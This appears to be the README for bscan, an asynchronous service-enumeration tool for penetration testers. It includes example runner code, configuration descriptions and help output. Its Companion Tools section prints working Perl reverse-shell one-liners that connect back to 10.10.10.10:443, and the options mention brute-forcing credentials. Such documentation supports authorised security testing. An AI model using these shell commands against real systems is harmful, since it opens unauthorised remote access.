Bscan - An Asynchronous Target Enumeration Tool



Synopsis
bscan is a command-line utility to perform active information gathering and service enumeration. At its core, bscan asynchronously spawns processes of well-known scanning utilities, repurposing scan results into highlighted console output and a well-defined directory structure.

Installation
bscan was written to be run on Kali Linux, but there is nothing inherently preventing it from running on any OS with the appropriate tools installed.
Download the latest packaged version from PyPI:
pip install bscan
Or get the bleeding-edge version from version control:
pip install https://github.com/welchbj/bscan/archive/master.tar.gz

Basic Usage
bscan has a wide variety of configuration options which can be used to tune scans to your needs. Here's a quick example:
$ bscan \
> --max-concurrency 3 \
> --patterns [Mm]icrosoft \
> --status-interval 10 \
> --verbose-status \
> scanme.nmap.org
What's going on here?
  • --max-concurrency 3 means that no more than 3 concurrent scan subprocesses will be run at a time
  • --patterns [Mm]icrosoft defines a custom regex pattern with which to highlight matches in the generated scan output
  • --status-interval 10 tells bscan to print runtime status updates every 10 seconds
  • --verbose-status means that each of these status updates will print details of all currently-running scan subprocesses
  • scanme.nmap.org is the host we want to enumerate
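To make the --max-concurrency and --patterns behaviour concrete, here is an added illustration of a bounded asynchronous subprocess runner that highlights regex matches and writes each scan's raw output to its own file. It is written for this page and is not bscan's own code: the Runner and enumerate_target names are its own, and the "scans" it runs are constructed stand-ins (printf emitting fabricated nmap-like lines) so that it runs offline without touching any host.

```python
"""Bounded asynchronous scan runner with regex highlighting and per-scan output
files. Added example, not bscan's own code; the scans below are constructed
stand-ins (printf printing fabricated output) so nothing on the network is
touched."""
import asyncio
import re
import tempfile
from pathlib import Path
from typing import Dict, List, Optional, Sequence, Tuple

# Constructed stand-ins for real scanner invocations. They are argv lists rather
# than shell strings, so a hostile target string can never reach a shell.
SAMPLE_SCANS: Dict[str, Sequence[str]] = {
    "quick-tcp": ["printf", "22/tcp open ssh     OpenSSH 7.4\n"
                            "80/tcp open http    Microsoft IIS httpd 8.5\n"],
    "http-headers": ["printf", "Server: Microsoft-IIS/8.5\nX-Powered-By: ASP.NET\n"],
    "ssh-banner": ["printf", "SSH-2.0-OpenSSH_7.4\n"],
    "smb-enum": ["printf", "OS: Windows Server 2012 R2 (Microsoft)\n"],
}

RED, RESET = "\033[31m", "\033[0m"


def highlight(text: str, patterns: List[str]) -> Tuple[str, int]:
    """Wrap every match of every pattern in ANSI red; return (text, hit count)."""
    hits = 0
    for pat in patterns:
        text, n = re.subn(f"({pat})", f"{RED}\\1{RESET}", text)
        hits += n
    return text, hits


class Runner:
    """Runs scans concurrently, never more than max_concurrency at once."""

    def __init__(self, max_concurrency: int, patterns: List[str], out_dir: Path):
        self.max_concurrency = max_concurrency
        self.patterns = patterns
        self.out_dir = out_dir
        self.running = 0
        self.peak = 0  # highest number of scan subprocesses alive at once

    async def run_one(self, name: str, argv: Sequence[str]) -> Tuple[str, int, int]:
        async with self.sem:  # blocks while max_concurrency scans are running
            self.running += 1
            self.peak = max(self.peak, self.running)
            proc = await asyncio.create_subprocess_exec(
                *argv, stdout=asyncio.subprocess.PIPE,
                stderr=asyncio.subprocess.STDOUT)
            raw, _ = await proc.communicate()
            self.running -= 1
        text = raw.decode(errors="replace")
        # one file per scan: the "well-defined directory structure"
        (self.out_dir / f"{name}.txt").write_text(text)
        colored, hits = highlight(text, self.patterns)
        print(f"[{name}] exit={proc.returncode} highlighted={hits}")
        print(colored, end="")
        return name, proc.returncode, hits

    async def run_all(self, scans: Dict[str, Sequence[str]]):
        # the semaphore is created inside the running loop on purpose
        self.sem = asyncio.Semaphore(self.max_concurrency)
        self.out_dir.mkdir(parents=True, exist_ok=True)
        return await asyncio.gather(*(self.run_one(n, a) for n, a in scans.items()))


def enumerate_target(scans: Dict[str, Sequence[str]], patterns: List[str],
                     max_concurrency: int = 3,
                     out_dir: Optional[Path] = None) -> Tuple[Dict[str, int], int]:
    """Run every scan; return ({scan name: pattern hits}, peak concurrency)."""
    out_dir = out_dir or Path(tempfile.mkdtemp(prefix="bscan-example-"))
    runner = Runner(max_concurrency, patterns, out_dir)
    results = asyncio.run(runner.run_all(scans))
    return {name: hits for name, _, hits in results}, runner.peak


if __name__ == "__main__":
    hits, peak = enumerate_target(SAMPLE_SCANS, ["[Mm]icrosoft", "OpenSSH"])
    print("hits by scan:", hits, "| peak concurrent subprocesses:", peak)
```

The semaphore is what --max-concurrency maps to: the fourth scan waits until one of the first three has exited. Using create_subprocess_exec with an argv list, rather than a shell string with the target interpolated, is the one hardening worth carrying into any tool that builds scanner commands from user-supplied targets.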
bscan also relies on some additional configuration files. The default files can be found in the bscan/configuration directory and serve the following purposes:
  • patterns.txt specifies the regex patterns to be highlighted in console output when matched with scan output
  • required-programs.txt specifies the installed programs that bscan plans on using
  • port-scans.toml defines the port-discovering scans to be run on the target(s), as well as the regular expressions used to parse port numbers and service names from scan output
  • service-scans.toml defines the scans to be run on the target(s) on a per-service basis
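The division of labour between port-scans.toml and service-scans.toml is easiest to see in code. The following is an added example written for this page, not bscan's own implementation or its real configuration format: the two config tables are hypothetical stand-ins (their field names and the {target}/{port}/{wordlist} placeholders are assumptions), and SAMPLE_OUTPUT is a constructed nmap-style excerpt, not captured from a real host.

```python
"""Regex-driven port/service parsing followed by per-service scan planning.
Added example, not bscan's own code; config tables and scan output below are
hypothetical / constructed."""
import re
from dataclasses import dataclass
from typing import Dict, List

# Hypothetical stand-in for port-scans.toml: a discovery command plus the regex
# that pulls port, protocol and service name out of its output.
PORT_SCANS = {
    "tcp-quick": {
        "command": "nmap -vv -Pn --top-ports 1000 {target}",
        "port_pattern": r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+open\s+(?P<service>\S+)",
    },
}

# Hypothetical stand-in for service-scans.toml: which service names trigger
# which follow-up commands.
SERVICE_SCANS = {
    "http": {
        "match": r"^(http|https|http-proxy)$",
        "commands": ["nikto -host {target} -port {port}",
                     "gobuster dir -u http://{target}:{port}/ -w {wordlist}"],
    },
    "ssh": {
        "match": r"^ssh$",
        "commands": ["nmap -p {port} --script ssh2-enum-algos {target}"],
    },
    "smb": {
        "match": r"^(microsoft-ds|netbios-ssn)$",
        "commands": ["enum4linux -a {target}"],
    },
}

# Constructed nmap normal-output excerpt (not real scan data).
SAMPLE_OUTPUT = """\
Nmap scan report for 10.10.10.10
PORT     STATE    SERVICE      VERSION
22/tcp   open     ssh          OpenSSH 6.6.1p1
80/tcp   open     http         Apache httpd 2.4.7
135/tcp  filtered msrpc
445/tcp  open     microsoft-ds
9929/tcp open     nping-echo   Nping echo
"""

# Targets end up inside shell commands, so only allow hostname, IP and CIDR
# characters; anything a shell could interpret is rejected up front.
TARGET_RE = re.compile(r"^[A-Za-z0-9.\-:/]+$")


@dataclass(frozen=True)
class OpenPort:
    port: int
    proto: str
    service: str


def safe_target(target: str) -> bool:
    """True when the target contains no shell metacharacters."""
    return TARGET_RE.fullmatch(target) is not None


def parse_ports(output: str, scan_name: str) -> List[OpenPort]:
    """Apply the configured regex line by line; closed/filtered lines don't match."""
    pat = re.compile(PORT_SCANS[scan_name]["port_pattern"], re.MULTILINE)
    return [OpenPort(int(m["port"]), m["proto"], m["service"])
            for m in pat.finditer(output)]


def plan_service_scans(target: str, ports: List[OpenPort],
                       wordlist: str = "/usr/share/wordlists/dirb/common.txt"
                       ) -> Dict[int, List[str]]:
    """Map each open port to the fully populated commands its service triggers.
    Services with no configured entry get nothing rather than a guess."""
    if not safe_target(target):
        raise ValueError(f"refusing target with shell metacharacters: {target!r}")
    plan: Dict[int, List[str]] = {}
    for p in ports:
        for cfg in SERVICE_SCANS.values():
            if re.search(cfg["match"], p.service):
                plan.setdefault(p.port, []).extend(
                    c.format(target=target, port=p.port, wordlist=wordlist)
                    for c in cfg["commands"])
    return plan


if __name__ == "__main__":
    found = parse_ports(SAMPLE_OUTPUT, "tcp-quick")
    for port, cmds in plan_service_scans("10.10.10.10", found).items():
        for cmd in cmds:
            print(f"{port:>5}  {cmd}")
```

Two details matter in practice: the port regex keys on the word "open", so filtered ports (135 above) never trigger follow-up scans, and a service with no configured entry (nping-echo) is silently skipped instead of being guessed at. The target check is the kind of guard you want in front of any config-driven command template, since the target string is the one piece of input that ends up verbatim in a shell command.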

Detailed Options
Here's what you should see when running bscan --help:
usage: bscan [OPTIONS] targets

 _
| |__  ___  ___ __ _ _ __
| '_ \/ __|/ __/ _` | '_ \
| |_) \__ \ (__ (_| | | | |
|_.__/|___/\___\__,_|_| |_|

an asynchronous service enumeration tool

positional arguments:
  targets               the targets and/or networks on which to perform enumeration

optional arguments:
  -h, --help            show this help message and exit
  --brute-pass-list F   filename of password list to use for brute-forcing
  --brute-user-list F   filename of user list to use for brute-forcing
  --cmd-print-width I   the maximum integer number of characters allowed when printing
                        the command used to spawn a running subprocess (defaults to 80)
  --config-dir D        the base directory from which to load the configuration files;
                        required configuration files missing from this directory will
                        instead be loaded from the default files shipped with this
                        program
  --hard                force overwrite of existing directories
  --max-concurrency I   maximum integer number of subprocesses permitted to be running
                        concurrently (defaults to 20)
  --no-program-check    disable checking the presence of required system programs
  --no-file-check       disable checking the presence of files such as configured
                        wordlists
  --no-service-scans    disable running scans on discovered services
  --output-dir D        the base directory in which to write output files
  --patterns [ [ ...]]  regex patterns to highlight in output text
  --ping-sweep          enable ping sweep filtering of hosts from a network range
                        before running more intensive scans
  --quick-only          whether to only run the quick scan (and not include the
                        thorough scan over all ports)
  --qs-method S         the method for performing the initial TCP port scan; must
                        correspond to a configured port scan
  --status-interval I   integer number of seconds to pause in between printing status
                        updates; a non-positive value disables updates (defaults to 30)
  --ts-method S         the method for performing the thorough TCP port scan; must
                        correspond to a configured port scan
  --udp                 whether to run UDP scans
  --udp-method S        the method for performing the UDP port scan; must correspond
                        to a configured port scan
  --verbose-status      whether to print verbose runtime status updates, based on
                        frequency specified by `--status-interval` flag
  --version             program version
  --web-word-list F     the wordlist to use for scans

Companion Tools
The main bscan program ships with two utility programs (bscan-wordlists and bscan-shells) to make your life a little easier when looking for wordlists and trying to open up reverse shells.
bscan-wordlists is a program designed for finding wordlist files on Kali Linux. It searches a few default directories and allows for glob filename matching. Here's a simple example:
$ bscan-wordlists --find "*win*"
/usr/share/wordlists/wfuzz/vulns/dirTraversal-win.txt
/usr/share/wordlists/metasploit/sensitive_files_win.txt
/usr/share/seclists/Passwords/common-passwords-win.txt
Try bscan-wordlists --help to explore other options.
bscan-shells is a program that will generate a variety of reverse shell one-liners with target and port fields populated for you. Here's a simple example to list all Perl-based shells, configured to connect back to 10.10.10.10 on port 443:
$ bscan-shells --port 443 10.10.10.10 | grep -i -A1 perl
perl for windows
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

perl with /bin/sh
perl -e 'use Socket;$i="10.10.10.10";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

perl without /bin/sh
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Note that bscan-shells pulls these commands from the reverse-shells.toml configuration file. Try bscan-shells --help to explore other options.

Development
Start by setting up a new development environment and installing the requirements (using virtualenvwrapper / virtualenvwrapper-win):
# set up the environment
mkvirtualenv -p $(which python3) bscan-dev
workon bscan-dev

# get the deps
pip install -r dev-requirements.txt
Lint and type-check the project (these are run on Travis, too):
flake8 . && mypy bscan
When it's time to package a new release:
# build source and wheel distributions
python setup.py bdist_wheel sdist

# run post-build checks
twine check dist/*

# upload to PyPI
twine upload dist/*